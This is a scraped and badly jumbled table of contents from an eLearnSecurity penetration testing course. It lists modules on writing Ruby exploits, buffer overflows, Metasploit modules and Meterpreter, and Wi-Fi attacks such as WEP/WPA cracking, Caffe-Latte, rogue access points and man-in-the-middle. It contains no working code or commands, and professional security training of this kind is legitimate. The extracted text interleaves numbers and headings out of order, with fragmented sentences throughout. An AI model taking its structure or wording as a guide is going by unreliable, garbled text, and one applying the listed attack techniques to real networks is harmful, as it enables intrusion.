Crawling 8. Bug detection 9. Fuzzing 9.Introduction 10. Identify the buffer overflow space 9.3.1. 9.2. we will present a vulnerable application that the student can use to learn how to write a full working exploit.1. Hera Labs are included in this module. and will learn how 26 10.1. Exploitation with Metasploit 10.1.1. it is time to start working with one of the most powerful Ruby tools: Metasploit.2. Create the payload 9.2. The vulnerability 10. Hera Labs are included in this module.1.2.2.3.1.2.1. Metasploit 10.1.2.4. In this module. The Exploit 9. Conclusion Downloadable scripts are included in this module. ELS Echo Server 9.4.1.2.3.2. It is time to take advantage of these skills and use Ruby in order to write and exploit vulnerable services and software.2. Using a debugger 9. Exploitation 9.3.8. Return address 9. Rex 10.4. Conclusion 10.7.2. The check method 10. 27 .3.3.5. Exploits 10.1. Nops.5. Meterpreter Basic API 10.3.4.2.4.4. MSFConsole 10.3.3.5. Modules 10.3.3.4.3.4.5.3.4.2.3.1.2.1. Targets considerations 10.Encoders 10.Meterpreter scripting 10.1. Plugins 10.4. Auxiliary 10.3.3. Module type and location 10.5.4.2.4.3.4.to create. Core Library 10.7.6.3.4.4. Some considerations 10.3. Web interface 10. Tools 10.3. Module high level structure 10.2. Post 10.4.4. Libraries 10. add or edit custom Metasploit modules. 10. MSFCli 10.6.4. Meterpreter scripts Downloadable scripts are included in this module.2.3.5.1.3.3.3.3. Hera Labs are included in this module. Module Information 10.4. Base Library 10.6.3.2. Others 10. Payloads 10.4.3.Explore and write the ELS Echo module 10. Thanks to our virtual labs.2.3.3. The exploit method 10. the student will also have the chance to practice against real vulnerable machines.3. The point 10. Software 1.Module 3: Wireless Standards and Networks .Module 5: Traffic Analysis . Conclusions .2. we will see which are the hardware/software prerequisites of the course. The student will learn the security mechanisms implemented in Wi-Fi architectures as well as their weaknesses and how to exploit them. .2. 28 1.2.Module 7: Wi-Fi as attack vector In the first module of the Wi-Fi section.2.Module 1: Prerequisites . Hardware 1.1. A note on signal strength 1.3.Module 6: Attacking Wi-Fi Networks .2. Antennas 1. Prerequisites 1.The Wi-Fi Security section is an extremely in-depth section covering all the most important attack techniques used against Wi-Fi networks.Module 4: Discover Wi-Fi Networks .1.Module 2: Environment setup . 5.1.1.1.6. WEP 3. how they work and which are the security features and mechanisms implemented. We will see which types of Wi-Fi configurations exist.2.1.2. Wireless Standards and Networks 3. Association response 3.3.3.6.2.4. the student will learn the basic concepts at the base of the Wi-Fi infrastructures.2.1.11 Standards 3. Beacon 3.4. 29 2.1.3.1. Association request 3. Environment setup 2. Ad‐Hoc Network 3.4. Initialization vector 3. RC4 3.1.1.1.4. Integrity Check Value 3.1. We will also present an overview of the most important flaws that affect different types of Wireless infrastructures and protocols.5.1. FSM attack 3.4. Authentication 3.4.2.1. Testing your setup 3.2. Infrastructure Network 3. Disassociation frame 3.1.2. Management Frames 3.2.1. Known plaintext attack 3.1.2.3.1. Security Features 3.4.1. KoreK 3.2.4.3.4.9.1. Deauthentication frame 3.4.1. Wireless Frames 3.3. Keystream reuse 3. Types of Wireless Network 3.In this module.2.1.1.1.1.1.2.1. the student will learn how to properly configure the test environment in order to obtain the best outcome from the successive modules.4.3. In the following module.1. Birthday paradox 3.2. Bit-flipping attack 3.4.1. Adapter configuration 2.2. IEEE 802. Encryption 3.3.4.3.1.2. PTW .1. WEP flaws 3.8.2.7. Considerations on Linux drivers 2.1.4.3.4.4.1.1.1.3. Introduction 2.3. Probe responses 3. Probe requests 3. Reassociation request/response 3.4.1.7.2.1. CRC-32 3.3.1.2.8.3. Monitor mode 5.2.2.1.2.1. Airodump-ng 4.4. Discover Wi-Fi Networks 4.4. Capturing traffic 5.1.1.3.4.5. Authentication 3.4. Downloadable exercises are included in this module. Traffic Analysis 5. Temporal Key Integrity Protocol 3. CCMP/AES 3.3.1. 30 . Channel Hopping 5.3.4.2.2.2. WPA2 3. Network de-cloaking Downloadable exercises are included in this module.3.4. the next step is to configure our tools in order to sniff and intercept the traffic. Shared Key Authetication Downloadable scripts are included in this module. Wireshark filters 5.2.1. WPA 3.1. 5. inSSIDer 4.4.1. In this module.3.1.4.1. Hidden SSID 4. Traffic decryption This is a very important step for all the attacks that come here after. we will see how to do this through a series of tools available for different platforms.1. Kismet 4.3. The first step when we run a penetration tests against Wi-Fi networks is to discover and identify our target.2. After the target network has been identified. Open System 3. 4.1.1. Tools 4.4.2. 2. Attacking the client 6.6. Practical Caffe-Latte Attack 6.5.7.1.2.5. A note on cracking speed 6. Pre-built hash files 6. Caffe-Latte overview 6. WPA and WPA2 6.1.1.The following module focuses on the attacks that can be executed on Wi-Fi networks.2. We will first start exploring the attacks against WEP and then focus our tests on more secure networks: WPA.2.1. The Four-Way Handshake 6.4. Pyrit 6.1.1.1.2.2.2.1. CloudCracker 6.2.2.2. Deauthentication attack 6.2.4. WPA2 and WPS. 6.2.1. ARP replay Attack 6. Overview and Setup 6. Using aircrack-ng against the handshake 6.2. Bypassing Shared Key Authentication 6.1. oclHashCat 6. Space-time tradeoff 6. Exploit the GPU power 6.5.2.1. The student will learn how to attack and access remote Wi-Fi networks.3.6.3.7. Cracking the key with aircrackng 6.1.1.7. WPS 6.3.2.2. according to their configuration and security mechanism. Conclusions Downloadable exercises are included in this module.1.1.1.4. Running PTW attack with aircrack-ng 6. KoreK attack 6.4.4.3. Capture the handshake 6.2. Clientless WEP cracking 6.1.1.6. WEP 6. password and much more.2.2. Build a wordlust with crunch 6. Cracking as a Service 6.6.1. 31 .1.3. obtain keys. Attacking Wi-Fi Networks 6.4. 1.1.3. 32 7. Man in the Middle attack 7.In the last module. Recover PRGA with a rogue AP 7.1.4.1.2.2. Wardriving . Wi-Fi as attack vector 7. the student will learn how to use Wi-Fi as an attack vector. of the Wi-Fi section. instead we will use Wi-Fi in order to create fake networks. Rogue AP 7. obtain credentials.1. Initiate a WPA/WPA2 handshake 7. run MitM attacks and much more. This means that we will not attack Wi-Fi networks.1. A typical Rogue AP scenario 7. eLearnSecurity is a leading provider of IT security and penetration testing courses including certifications for IT professionals. All eLearnSecurity courses utilize engaging eLearning and the most effective mix of theory.R.L Via Matteucci 36/38 56124 Pisa.elearnsecurity. please visit http://www. eLearnSecurity's mission is to advance the career of IT security professionals by providing affordable and comprehensive education and certification. Dubai (UAE) and in San Jose (USA). practice and methodology in IT security .About eLearnSecurity A leading innovator in the field of practical. Based in Pisa (Italy). 33 . Italy For more information.all with real-world lessons that students can immediately apply to build relevant skills and keep their organization's data and systems safe. hands-on IT security training. © 2014 eLearnSecurity S.com.
Report "Penetration testing Professional"
×
Please fill this form, we will try to respond as soon as possible.
Your name
Email
Reason
-Select Reason-
Pornographic
Defamatory
Illegal/Unlawful
Spam
Other Terms Of Service Violation
File a copyright complaint
Description
Copyright © 2024 DOKUMEN.SITE Inc.